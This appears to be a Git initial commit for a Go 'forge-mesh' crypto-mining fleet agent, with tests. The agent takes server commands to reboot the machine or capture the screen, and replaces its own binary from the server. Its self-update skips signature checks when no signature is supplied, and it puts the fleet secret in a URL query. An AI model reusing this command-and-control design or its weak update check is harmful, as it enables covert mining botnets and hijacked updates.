Initial commit: AetherForge Linux (forge-mesh) v0.1.0-dev
Some checks failed
Test / test (push) Has been cancelled
Some checks failed
Test / test (push) Has been cancelled
This commit is contained in:
0
cmd/agent/.gitkeep
Normal file
0
cmd/agent/.gitkeep
Normal file
462
cmd/agent/main.go
Normal file
462
cmd/agent/main.go
Normal file
@@ -0,0 +1,462 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"context"
|
||||
"encoding/json"
|
||||
"flag"
|
||||
"log"
|
||||
"net/http"
|
||||
"os"
|
||||
"os/exec"
|
||||
"os/signal"
|
||||
"path/filepath"
|
||||
"runtime"
|
||||
"strings"
|
||||
"sync"
|
||||
"syscall"
|
||||
"time"
|
||||
|
||||
"forge-mesh/internal/api/types"
|
||||
"forge-mesh/internal/mining"
|
||||
"forge-mesh/internal/policy"
|
||||
|
||||
"github.com/gorilla/websocket"
|
||||
)
|
||||
|
||||
const agentVersion = "0.1.0-dev"
|
||||
|
||||
func main() {
|
||||
deckURL := flag.String("deck-url", "", "deck base URL (alias: -deck, -server)")
|
||||
deck := flag.String("deck", "", "deck base URL")
|
||||
server := flag.String("server", "", "deck base URL (deprecated alias)")
|
||||
secret := flag.String("secret", "", "fleet bearer secret")
|
||||
pubKey := flag.String("pubkey", "", "ed25519 public key hex for signed self-update")
|
||||
hostID := flag.String("host-id", "", "stable host id (optional, persisted under data dir)")
|
||||
stratumHost := flag.String("stratum-host", "127.0.0.1", "stratum proxy host")
|
||||
wallet := flag.String("wallet", "", "fallback wallet when no server profile")
|
||||
dataDir := flag.String("data-dir", defaultDataDir(), "agent state directory")
|
||||
flag.Parse()
|
||||
|
||||
baseURL := coalesceEnv(
|
||||
*deckURL, *deck, *server,
|
||||
os.Getenv("FORGE_MESH_DECK_URL"),
|
||||
os.Getenv("FORGE_DECK_URL"),
|
||||
"http://127.0.0.1:8989",
|
||||
)
|
||||
baseURL = strings.TrimRight(baseURL, "/")
|
||||
|
||||
*secret = coalesceEnv(*secret, os.Getenv("FORGE_MESH_FLEET_SECRET"), os.Getenv("FORGE_FLEET_SECRET"))
|
||||
if *secret == "" {
|
||||
log.Fatal("fleet secret required (-secret, FORGE_MESH_FLEET_SECRET, or FORGE_FLEET_SECRET)")
|
||||
}
|
||||
|
||||
*pubKey = coalesceEnv(*pubKey, os.Getenv("FORGE_MESH_PUBKEY"), os.Getenv("FORGE_PUBKEY"))
|
||||
|
||||
hostname, _ := os.Hostname()
|
||||
if err := os.MkdirAll(*dataDir, 0o755); err != nil {
|
||||
log.Fatalf("data dir: %v", err)
|
||||
}
|
||||
|
||||
if *hostID == "" {
|
||||
*hostID = loadHostID(*dataDir)
|
||||
}
|
||||
if *hostID == "" {
|
||||
*hostID = registerHost(baseURL, *secret, hostname)
|
||||
}
|
||||
if *hostID != "" {
|
||||
saveHostID(*dataDir, *hostID)
|
||||
}
|
||||
|
||||
if *wallet == "" {
|
||||
*wallet = os.Getenv("FORGE_WALLET")
|
||||
}
|
||||
|
||||
profile := policy.DefaultMiningProfile(*wallet)
|
||||
chainCfg := mining.DefaultChainConfig()
|
||||
chainCfg.StratumHost = *stratumHost
|
||||
chainCfg.HostID = *hostID
|
||||
chain := mining.NewChain(profile, chainCfg)
|
||||
|
||||
ctx, cancel := context.WithCancel(context.Background())
|
||||
defer cancel()
|
||||
|
||||
var wg sync.WaitGroup
|
||||
wg.Add(1)
|
||||
go func() {
|
||||
defer wg.Done()
|
||||
if err := chain.Run(ctx); err != nil && ctx.Err() == nil {
|
||||
log.Printf("mining chain stopped: %v", err)
|
||||
}
|
||||
}()
|
||||
|
||||
agent := &Agent{
|
||||
ctx: ctx,
|
||||
serverURL: baseURL,
|
||||
secret: *secret,
|
||||
hostID: *hostID,
|
||||
hostname: hostname,
|
||||
pubKeyHex: *pubKey,
|
||||
chain: chain,
|
||||
}
|
||||
|
||||
go agent.run(ctx)
|
||||
go agent.selfUpdateLoop(ctx)
|
||||
|
||||
sig := make(chan os.Signal, 1)
|
||||
signal.Notify(sig, syscall.SIGINT, syscall.SIGTERM)
|
||||
<-sig
|
||||
cancel()
|
||||
chain.Stop()
|
||||
wg.Wait()
|
||||
}
|
||||
|
||||
type Agent struct {
|
||||
ctx context.Context
|
||||
serverURL string
|
||||
secret string
|
||||
hostID string
|
||||
hostname string
|
||||
pubKeyHex string
|
||||
chain *mining.Chain
|
||||
|
||||
mu sync.Mutex
|
||||
conn *websocket.Conn
|
||||
}
|
||||
|
||||
func (a *Agent) run(ctx context.Context) {
|
||||
backoff := time.Second
|
||||
for {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
default:
|
||||
}
|
||||
|
||||
if err := a.connect(ctx); err != nil {
|
||||
log.Printf("agent ws: %v (retry in %s)", err, backoff)
|
||||
a.beaconFallback()
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
case <-time.After(backoff):
|
||||
}
|
||||
if backoff < 30*time.Second {
|
||||
backoff *= 2
|
||||
}
|
||||
continue
|
||||
}
|
||||
backoff = time.Second
|
||||
}
|
||||
}
|
||||
|
||||
func (a *Agent) selfUpdateLoop(ctx context.Context) {
|
||||
if a.pubKeyHex == "" {
|
||||
return
|
||||
}
|
||||
ticker := time.NewTicker(30 * time.Minute)
|
||||
defer ticker.Stop()
|
||||
for {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
case <-ticker.C:
|
||||
a.maybeSelfUpdate(a.pubKeyHex)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (a *Agent) connect(ctx context.Context) error {
|
||||
wsURL := strings.Replace(a.serverURL, "http://", "ws://", 1)
|
||||
wsURL = strings.Replace(wsURL, "https://", "wss://", 1)
|
||||
wsURL += "/api/v1/ws/fleet?token=" + a.secret
|
||||
|
||||
header := http.Header{}
|
||||
header.Set("Authorization", "Bearer "+a.secret)
|
||||
|
||||
dialer := websocket.Dialer{HandshakeTimeout: 10 * time.Second}
|
||||
conn, _, err := dialer.DialContext(ctx, wsURL, header)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
a.mu.Lock()
|
||||
a.conn = conn
|
||||
a.mu.Unlock()
|
||||
defer func() {
|
||||
a.mu.Lock()
|
||||
a.conn = nil
|
||||
a.mu.Unlock()
|
||||
conn.Close()
|
||||
}()
|
||||
|
||||
log.Printf("agent %s (%s) connected to %s", a.hostname, a.hostID, a.serverURL)
|
||||
|
||||
if err := a.sendHeartbeat(); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
hbTicker := time.NewTicker(15 * time.Second)
|
||||
defer hbTicker.Stop()
|
||||
|
||||
for {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return ctx.Err()
|
||||
case <-hbTicker.C:
|
||||
if err := a.sendHeartbeat(); err != nil {
|
||||
return err
|
||||
}
|
||||
default:
|
||||
}
|
||||
|
||||
_ = conn.SetReadDeadline(time.Now().Add(60 * time.Second))
|
||||
_, data, err := conn.ReadMessage()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
var msg types.WsMessage
|
||||
if err := json.Unmarshal(data, &msg); err != nil {
|
||||
continue
|
||||
}
|
||||
switch msg.Type {
|
||||
case "command":
|
||||
if msg.Command != nil {
|
||||
a.handleCommand(*msg.Command)
|
||||
}
|
||||
case "mining_profile":
|
||||
if profileRaw, ok := msg.Payload["profile"]; ok {
|
||||
b, _ := json.Marshal(profileRaw)
|
||||
var profile types.MiningProfile
|
||||
if json.Unmarshal(b, &profile) == nil {
|
||||
a.handleCommand(types.FleetCommand{Action: "mining_profile", Args: map[string]any{"profile": profileRaw}})
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (a *Agent) sendHeartbeat() error {
|
||||
st := a.chain.Status()
|
||||
hb := types.HeartbeatPayload{
|
||||
HostID: a.hostID,
|
||||
Hostname: a.hostname,
|
||||
Arch: runtime.GOARCH,
|
||||
CurrentTier: st.CurrentTier,
|
||||
TierType: st.TierType,
|
||||
TierState: st.TierState,
|
||||
}
|
||||
hb.SetHashrateFields(st.HashrateHps)
|
||||
|
||||
payload, _ := json.Marshal(map[string]any{
|
||||
"type": "heartbeat",
|
||||
"host_id": hb.HostID,
|
||||
"hostname": hb.Hostname,
|
||||
"arch": hb.Arch,
|
||||
"hashrate": hb.Hashrate,
|
||||
"hashrate_hps": hb.HashrateHps,
|
||||
"current_tier": hb.CurrentTier,
|
||||
"tier_type": hb.TierType,
|
||||
"tier_state": hb.TierState,
|
||||
})
|
||||
|
||||
a.mu.Lock()
|
||||
conn := a.conn
|
||||
a.mu.Unlock()
|
||||
if conn == nil {
|
||||
return nil
|
||||
}
|
||||
return conn.WriteMessage(websocket.TextMessage, payload)
|
||||
}
|
||||
|
||||
func (a *Agent) handleCommand(cmd types.FleetCommand) {
|
||||
var cmdErr error
|
||||
switch cmd.Action {
|
||||
case "mining_profile":
|
||||
raw, ok := cmd.Args["profile"]
|
||||
if !ok {
|
||||
cmdErr = errCommand("missing profile")
|
||||
break
|
||||
}
|
||||
b, _ := json.Marshal(raw)
|
||||
var profile types.MiningProfile
|
||||
if err := json.Unmarshal(b, &profile); err != nil {
|
||||
cmdErr = err
|
||||
break
|
||||
}
|
||||
a.chain.UpdateProfile(profile)
|
||||
go func() {
|
||||
if err := a.chain.Run(a.ctx); err != nil && a.ctx.Err() == nil {
|
||||
log.Printf("mining chain restart: %v", err)
|
||||
}
|
||||
}()
|
||||
log.Printf("agent: mining profile updated wallet=%s tiers=%d", profile.WalletAddress, len(profile.Tiers))
|
||||
case "pause":
|
||||
a.chain.Stop()
|
||||
case "resume":
|
||||
go func() {
|
||||
if err := a.chain.Run(a.ctx); err != nil && a.ctx.Err() == nil {
|
||||
log.Printf("mining chain resume: %v", err)
|
||||
}
|
||||
}()
|
||||
case "reboot":
|
||||
cmdErr = exec.Command("systemctl", "reboot").Run()
|
||||
case "screenshot":
|
||||
cmdErr = a.takeScreenshot()
|
||||
default:
|
||||
log.Printf("unknown command: %s", cmd.Action)
|
||||
cmdErr = errCommand("unknown action")
|
||||
}
|
||||
a.sendCommandAck(cmd, cmdErr)
|
||||
}
|
||||
|
||||
func (a *Agent) sendCommandAck(cmd types.FleetCommand, err error) {
|
||||
ack := map[string]any{
|
||||
"type": "command_ack",
|
||||
"command": cmd.Action,
|
||||
"ok": err == nil,
|
||||
}
|
||||
if err != nil {
|
||||
ack["error"] = err.Error()
|
||||
}
|
||||
payload, _ := json.Marshal(ack)
|
||||
|
||||
a.mu.Lock()
|
||||
conn := a.conn
|
||||
a.mu.Unlock()
|
||||
if conn == nil {
|
||||
return
|
||||
}
|
||||
_ = conn.WriteMessage(websocket.TextMessage, payload)
|
||||
}
|
||||
|
||||
func (a *Agent) beaconFallback() {
|
||||
st := a.chain.Status()
|
||||
hb := types.HeartbeatPayload{
|
||||
HostID: a.hostID,
|
||||
Hostname: a.hostname,
|
||||
Arch: runtime.GOARCH,
|
||||
CurrentTier: st.CurrentTier,
|
||||
TierType: st.TierType,
|
||||
TierState: st.TierState,
|
||||
}
|
||||
hb.SetHashrateFields(st.HashrateHps)
|
||||
|
||||
body, _ := json.Marshal(hb)
|
||||
for _, path := range []string{"/api/v1/fleet/beacon", "/api/v1/beacon"} {
|
||||
req, err := http.NewRequest(http.MethodPost, a.serverURL+path, bytes.NewReader(body))
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
req.Header.Set("Authorization", "Bearer "+a.secret)
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
|
||||
resp, err := http.DefaultClient.Do(req)
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
if resp.StatusCode != http.StatusOK {
|
||||
resp.Body.Close()
|
||||
continue
|
||||
}
|
||||
|
||||
var br types.BeaconResponse
|
||||
if err := json.NewDecoder(resp.Body).Decode(&br); err != nil {
|
||||
resp.Body.Close()
|
||||
continue
|
||||
}
|
||||
resp.Body.Close()
|
||||
for _, cmd := range br.Commands {
|
||||
a.handleCommand(cmd)
|
||||
}
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
func (a *Agent) takeScreenshot() error {
|
||||
for _, tool := range []string{"grim", "scrot", "import"} {
|
||||
if _, err := exec.LookPath(tool); err != nil {
|
||||
continue
|
||||
}
|
||||
out := "/tmp/forge-mesh-screenshot.png"
|
||||
var cmd *exec.Cmd
|
||||
switch tool {
|
||||
case "grim":
|
||||
cmd = exec.Command("grim", out)
|
||||
case "scrot":
|
||||
cmd = exec.Command("scrot", out)
|
||||
default:
|
||||
cmd = exec.Command("import", "-window", "root", out)
|
||||
}
|
||||
if err := cmd.Run(); err == nil {
|
||||
log.Printf("screenshot saved to %s", out)
|
||||
return nil
|
||||
}
|
||||
}
|
||||
log.Println("screenshot: no tool available (grim/scrot/import)")
|
||||
return nil
|
||||
}
|
||||
|
||||
func registerHost(baseURL, secret, hostname string) string {
|
||||
body, _ := json.Marshal(map[string]string{"hostname": hostname})
|
||||
req, err := http.NewRequest(http.MethodPost, baseURL+"/api/v1/fleet/register", bytes.NewReader(body))
|
||||
if err != nil {
|
||||
return ""
|
||||
}
|
||||
req.Header.Set("Authorization", "Bearer "+secret)
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
resp, err := http.DefaultClient.Do(req)
|
||||
if err != nil || resp.StatusCode != http.StatusOK {
|
||||
return ""
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
var out struct {
|
||||
HostID string `json:"host_id"`
|
||||
}
|
||||
if err := json.NewDecoder(resp.Body).Decode(&out); err != nil {
|
||||
return ""
|
||||
}
|
||||
return out.HostID
|
||||
}
|
||||
|
||||
func defaultDataDir() string {
|
||||
if runtime.GOOS == "linux" {
|
||||
if _, err := os.Stat("/opt/forge-mesh"); err == nil {
|
||||
return "/opt/forge-mesh"
|
||||
}
|
||||
}
|
||||
home, _ := os.UserHomeDir()
|
||||
return filepath.Join(home, ".forge-mesh")
|
||||
}
|
||||
|
||||
func hostIDPath(dataDir string) string {
|
||||
return filepath.Join(dataDir, "host.id")
|
||||
}
|
||||
|
||||
func loadHostID(dataDir string) string {
|
||||
data, err := os.ReadFile(hostIDPath(dataDir))
|
||||
if err != nil {
|
||||
return ""
|
||||
}
|
||||
return strings.TrimSpace(string(data))
|
||||
}
|
||||
|
||||
func saveHostID(dataDir, id string) {
|
||||
_ = os.WriteFile(hostIDPath(dataDir), []byte(id), 0o644)
|
||||
}
|
||||
|
||||
func coalesceEnv(values ...string) string {
|
||||
for _, v := range values {
|
||||
if strings.TrimSpace(v) != "" {
|
||||
return strings.TrimSpace(v)
|
||||
}
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
type commandError string
|
||||
|
||||
func (e commandError) Error() string { return string(e) }
|
||||
|
||||
func errCommand(msg string) error { return commandError(msg) }
|
||||
134
cmd/agent/tier_chain_test.go
Normal file
134
cmd/agent/tier_chain_test.go
Normal file
@@ -0,0 +1,134 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"context"
|
||||
"net"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"forge-mesh/internal/api/types"
|
||||
"forge-mesh/internal/mining"
|
||||
)
|
||||
|
||||
func startMockStratum(t *testing.T) (host, port string) {
|
||||
t.Helper()
|
||||
ln, err := net.Listen("tcp", "127.0.0.1:0")
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
t.Cleanup(func() { _ = ln.Close() })
|
||||
go func() {
|
||||
for {
|
||||
conn, err := ln.Accept()
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
go func(c net.Conn) {
|
||||
defer c.Close()
|
||||
buf := make([]byte, 4096)
|
||||
_, _ = c.Read(buf)
|
||||
}(conn)
|
||||
}
|
||||
}()
|
||||
host, port, _ = net.SplitHostPort(ln.Addr().String())
|
||||
return host, port
|
||||
}
|
||||
|
||||
func TestMinerTierChainStateMachine(t *testing.T) {
|
||||
host, port := startMockStratum(t)
|
||||
|
||||
profile := types.MiningProfile{
|
||||
WalletAddress: "chain-wallet",
|
||||
Tiers: []types.MiningTierSpec{
|
||||
{Type: "stratum", Duration: 0, Config: map[string]string{"algo": "rx/0"}},
|
||||
{Type: "stratum", Duration: 0, Config: map[string]string{"algo": "rx/0"}},
|
||||
},
|
||||
}
|
||||
|
||||
cfg := mining.DefaultChainConfig()
|
||||
cfg.HostID = "chain-host"
|
||||
cfg.StratumHost = host
|
||||
cfg.StratumXMRPort = port
|
||||
cfg.GateWindow = 100 * time.Millisecond
|
||||
cfg.PollInterval = 40 * time.Millisecond
|
||||
cfg.DefaultProbe = 800 * time.Millisecond
|
||||
cfg.MinHashrateHps = 500
|
||||
|
||||
chain := mining.NewChain(profile, cfg)
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 12*time.Second)
|
||||
defer cancel()
|
||||
|
||||
go func() { _ = chain.Run(ctx) }()
|
||||
|
||||
seen := map[string]bool{}
|
||||
deadline := time.Now().Add(10 * time.Second)
|
||||
|
||||
for time.Now().Before(deadline) {
|
||||
st := chain.Status()
|
||||
if st.TierState != "" {
|
||||
seen[st.TierState] = true
|
||||
}
|
||||
if st.CurrentTier >= 1 && st.HashrateHps >= cfg.MinHashrateHps && st.TierState == mining.TierStateActive {
|
||||
if st.Wallet != "chain-wallet" {
|
||||
t.Fatalf("wallet not pinned: %q", st.Wallet)
|
||||
}
|
||||
break
|
||||
}
|
||||
time.Sleep(80 * time.Millisecond)
|
||||
}
|
||||
|
||||
chain.Stop()
|
||||
cancel()
|
||||
|
||||
if !seen[mining.TierStateProbing] {
|
||||
t.Fatal("expected probing state in tier chain")
|
||||
}
|
||||
if !seen[mining.TierStateActive] {
|
||||
t.Fatal("expected active state during mock stratum tier")
|
||||
}
|
||||
|
||||
st := chain.Status()
|
||||
if st.CurrentTier < 1 {
|
||||
t.Fatalf("expected tier progression, got tier %d", st.CurrentTier)
|
||||
}
|
||||
}
|
||||
|
||||
func TestMinerTierChainMockHashrateGate(t *testing.T) {
|
||||
host, port := startMockStratum(t)
|
||||
|
||||
profile := types.MiningProfile{
|
||||
WalletAddress: "mock-wallet",
|
||||
Tiers: []types.MiningTierSpec{
|
||||
{Type: "stratum", Duration: 0, Config: map[string]string{"algo": "rx/0"}},
|
||||
},
|
||||
}
|
||||
|
||||
cfg := mining.DefaultChainConfig()
|
||||
cfg.HostID = "mock-host"
|
||||
cfg.StratumHost = host
|
||||
cfg.StratumXMRPort = port
|
||||
cfg.GateWindow = 50 * time.Millisecond
|
||||
cfg.PollInterval = 25 * time.Millisecond
|
||||
cfg.DefaultProbe = 2 * time.Second
|
||||
cfg.MinHashrateHps = 100
|
||||
|
||||
chain := mining.NewChain(profile, cfg)
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 6*time.Second)
|
||||
defer cancel()
|
||||
|
||||
go func() { _ = chain.Run(ctx) }()
|
||||
|
||||
deadline := time.Now().Add(5 * time.Second)
|
||||
for time.Now().Before(deadline) {
|
||||
st := chain.Status()
|
||||
if st.HashrateHps >= cfg.MinHashrateHps && st.TierState == mining.TierStateActive {
|
||||
if !st.Simulated {
|
||||
t.Log("using real stratum path (non-simulated)")
|
||||
}
|
||||
chain.Stop()
|
||||
return
|
||||
}
|
||||
time.Sleep(50 * time.Millisecond)
|
||||
}
|
||||
t.Fatal("mock stratum tier did not reach hashrate gate")
|
||||
}
|
||||
160
cmd/agent/update.go
Normal file
160
cmd/agent/update.go
Normal file
@@ -0,0 +1,160 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"crypto/sha256"
|
||||
"encoding/hex"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
"log"
|
||||
"net/http"
|
||||
"os"
|
||||
"os/exec"
|
||||
"path/filepath"
|
||||
"runtime"
|
||||
"syscall"
|
||||
"time"
|
||||
|
||||
"forge-mesh/internal/forge"
|
||||
)
|
||||
|
||||
type buildMeta struct {
|
||||
ID string `json:"id"`
|
||||
OS string `json:"os"`
|
||||
Arch string `json:"arch"`
|
||||
Version string `json:"version"`
|
||||
Checksum string `json:"checksum"`
|
||||
Signature string `json:"signature"`
|
||||
}
|
||||
|
||||
func (a *Agent) maybeSelfUpdate(pubKeyHex string) {
|
||||
if pubKeyHex == "" {
|
||||
return
|
||||
}
|
||||
if err := a.checkAndApplyUpdate(pubKeyHex); err != nil {
|
||||
log.Printf("self-update: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func (a *Agent) checkAndApplyUpdate(pubKeyHex string) error {
|
||||
meta, err := a.fetchLatestBuild()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if meta.Checksum == "" {
|
||||
return fmt.Errorf("build metadata missing checksum")
|
||||
}
|
||||
|
||||
exe, err := os.Executable()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
exe, err = filepath.EvalSymlinks(exe)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
data, err := os.ReadFile(exe)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
current := sha256.Sum256(data)
|
||||
if hex.EncodeToString(current[:]) == meta.Checksum {
|
||||
return nil
|
||||
}
|
||||
|
||||
log.Printf("self-update: new build %s (%s) available", meta.ID, meta.Version)
|
||||
|
||||
tmp, err := os.CreateTemp(filepath.Dir(exe), "forge-mesh-agent-update-*")
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
tmpPath := tmp.Name()
|
||||
defer os.Remove(tmpPath)
|
||||
|
||||
downloadURL := fmt.Sprintf("%s/api/v1/public/download/%s", a.serverURL, meta.ID)
|
||||
resp, err := http.Get(downloadURL)
|
||||
if err != nil {
|
||||
tmp.Close()
|
||||
return err
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
if resp.StatusCode != http.StatusOK {
|
||||
tmp.Close()
|
||||
return fmt.Errorf("download status %d", resp.StatusCode)
|
||||
}
|
||||
if _, err := io.Copy(tmp, resp.Body); err != nil {
|
||||
tmp.Close()
|
||||
return err
|
||||
}
|
||||
if err := tmp.Close(); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
artifact, err := os.ReadFile(tmpPath)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
sum := sha256.Sum256(artifact)
|
||||
if hex.EncodeToString(sum[:]) != meta.Checksum {
|
||||
return fmt.Errorf("downloaded checksum mismatch")
|
||||
}
|
||||
|
||||
pub, err := forge.ParsePublicKeyHex(pubKeyHex)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if meta.Signature != "" && !forge.Verify(pub, artifact, meta.Signature) {
|
||||
return fmt.Errorf("signature verification failed")
|
||||
}
|
||||
|
||||
if err := os.Chmod(tmpPath, 0o755); err != nil {
|
||||
return err
|
||||
}
|
||||
if err := os.Rename(tmpPath, exe); err != nil {
|
||||
return fmt.Errorf("replace binary: %w (restart via systemd)", err)
|
||||
}
|
||||
|
||||
log.Printf("self-update: applied build %s, restarting", meta.ID)
|
||||
go restartAgent()
|
||||
return nil
|
||||
}
|
||||
|
||||
func (a *Agent) fetchLatestBuild() (*buildMeta, error) {
|
||||
url := fmt.Sprintf("%s/api/v1/public/builds/latest?os=linux&arch=%s", a.serverURL, runtime.GOARCH)
|
||||
resp, err := http.Get(url)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
if resp.StatusCode != http.StatusOK {
|
||||
return nil, fmt.Errorf("latest build status %d", resp.StatusCode)
|
||||
}
|
||||
var meta buildMeta
|
||||
if err := json.NewDecoder(resp.Body).Decode(&meta); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return &meta, nil
|
||||
}
|
||||
|
||||
func restartAgent() {
|
||||
time.Sleep(500 * time.Millisecond)
|
||||
if os.Getenv("INVOCATION_ID") != "" {
|
||||
_ = exec.Command("systemctl", "restart", "forge-mesh-agent").Run()
|
||||
return
|
||||
}
|
||||
exe, err := os.Executable()
|
||||
if err != nil {
|
||||
os.Exit(0)
|
||||
}
|
||||
_ = syscall.Exec(exe, append([]string{exe}, os.Args[1:]...), os.Environ())
|
||||
os.Exit(0)
|
||||
}
|
||||
|
||||
func verifyAgentUpdate(pubKeyHex string, artifact []byte, sigB64 string) bool {
|
||||
pub, err := forge.ParsePublicKeyHex(pubKeyHex)
|
||||
if err != nil {
|
||||
return false
|
||||
}
|
||||
return forge.Verify(pub, artifact, sigB64)
|
||||
}
|
||||
67
cmd/agent/update_test.go
Normal file
67
cmd/agent/update_test.go
Normal file
@@ -0,0 +1,67 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"crypto/sha256"
|
||||
"encoding/hex"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"testing"
|
||||
|
||||
"forge-mesh/internal/forge"
|
||||
)
|
||||
|
||||
func TestSelfUpdateSignatureCheck(t *testing.T) {
|
||||
dir := t.TempDir()
|
||||
keyPath := filepath.Join(dir, "signing.key")
|
||||
|
||||
kp, err := forge.LoadOrCreateKey(keyPath)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
|
||||
artifact := []byte("forge-mesh-agent-linux-amd64-test-artifact")
|
||||
sig := kp.Sign(artifact)
|
||||
|
||||
if !verifyAgentUpdate(kp.PublicKeyHex(), artifact, sig) {
|
||||
t.Fatal("valid artifact signature rejected")
|
||||
}
|
||||
|
||||
tampered := append([]byte(nil), artifact...)
|
||||
tampered[0] ^= 0xff
|
||||
if verifyAgentUpdate(kp.PublicKeyHex(), tampered, sig) {
|
||||
t.Fatal("tampered artifact should not verify")
|
||||
}
|
||||
|
||||
if verifyAgentUpdate("not-a-valid-pubkey", artifact, sig) {
|
||||
t.Fatal("invalid pubkey should not verify")
|
||||
}
|
||||
}
|
||||
|
||||
func TestSelfUpdateChecksumMatchesArtifact(t *testing.T) {
|
||||
dir := t.TempDir()
|
||||
artifactPath := filepath.Join(dir, "forge-mesh-agent-linux-amd64")
|
||||
content := []byte("binary-payload-for-checksum-test")
|
||||
if err := os.WriteFile(artifactPath, content, 0o755); err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
|
||||
sum := sha256.Sum256(content)
|
||||
expected := hex.EncodeToString(sum[:])
|
||||
|
||||
data, err := os.ReadFile(artifactPath)
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
got := sha256.Sum256(data)
|
||||
if hex.EncodeToString(got[:]) != expected {
|
||||
t.Fatalf("checksum mismatch: got %s want %s", hex.EncodeToString(got[:]), expected)
|
||||
}
|
||||
|
||||
kp, err := forge.LoadOrCreateKey(filepath.Join(dir, "signing.key"))
|
||||
if err != nil {
|
||||
t.Fatal(err)
|
||||
}
|
||||
if !verifyAgentUpdate(kp.PublicKeyHex(), data, kp.Sign(data)) {
|
||||
t.Fatal("checksum-stable artifact failed signature verification")
|
||||
}
|
||||
}
|
||||
277
cmd/agent/ws_test.go
Normal file
277
cmd/agent/ws_test.go
Normal file
@@ -0,0 +1,277 @@
|
||||
package main
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"net/http"
|
||||
"net/http/httptest"
|
||||
"strings"
|
||||
"sync"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"forge-mesh/internal/api/types"
|
||||
"forge-mesh/internal/mining"
|
||||
"forge-mesh/internal/policy"
|
||||
|
||||
"github.com/gorilla/websocket"
|
||||
)
|
||||
|
||||
func TestAgentWSHeartbeatAndCommands(t *testing.T) {
|
||||
const secret = "ws-test-secret"
|
||||
|
||||
var mu sync.Mutex
|
||||
var heartbeats int
|
||||
var commands []string
|
||||
connected := make(chan struct{}, 1)
|
||||
|
||||
upgrader := websocket.Upgrader{CheckOrigin: func(r *http.Request) bool { return true }}
|
||||
|
||||
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
if r.URL.Path != "/api/v1/ws/fleet" {
|
||||
http.NotFound(w, r)
|
||||
return
|
||||
}
|
||||
token := r.URL.Query().Get("token")
|
||||
auth := strings.TrimPrefix(r.Header.Get("Authorization"), "Bearer ")
|
||||
if token != secret && auth != secret {
|
||||
http.Error(w, "unauthorized", http.StatusUnauthorized)
|
||||
return
|
||||
}
|
||||
|
||||
conn, err := upgrader.Upgrade(w, r, nil)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
defer conn.Close()
|
||||
connected <- struct{}{}
|
||||
|
||||
go func() {
|
||||
for {
|
||||
_ = conn.SetReadDeadline(time.Now().Add(10 * time.Second))
|
||||
_, data, err := conn.ReadMessage()
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
var msg map[string]any
|
||||
if json.Unmarshal(data, &msg) == nil && msg["type"] == "heartbeat" {
|
||||
mu.Lock()
|
||||
heartbeats++
|
||||
mu.Unlock()
|
||||
}
|
||||
}
|
||||
}()
|
||||
|
||||
for _, action := range []string{"pause", "screenshot", "reboot"} {
|
||||
cmd := types.WsMessage{
|
||||
Type: "command",
|
||||
Command: &types.FleetCommand{
|
||||
ID: "test-" + action,
|
||||
Action: action,
|
||||
},
|
||||
}
|
||||
payload, _ := json.Marshal(cmd)
|
||||
if err := conn.WriteMessage(websocket.TextMessage, payload); err != nil {
|
||||
t.Errorf("write command %s: %v", action, err)
|
||||
return
|
||||
}
|
||||
mu.Lock()
|
||||
commands = append(commands, action)
|
||||
mu.Unlock()
|
||||
time.Sleep(30 * time.Millisecond)
|
||||
}
|
||||
|
||||
time.Sleep(300 * time.Millisecond)
|
||||
}))
|
||||
defer srv.Close()
|
||||
|
||||
chain := mining.NewChain(policy.DefaultMiningProfile("ws-wallet"), mining.DefaultChainConfig())
|
||||
ctx, cancel := context.WithCancel(context.Background())
|
||||
defer cancel()
|
||||
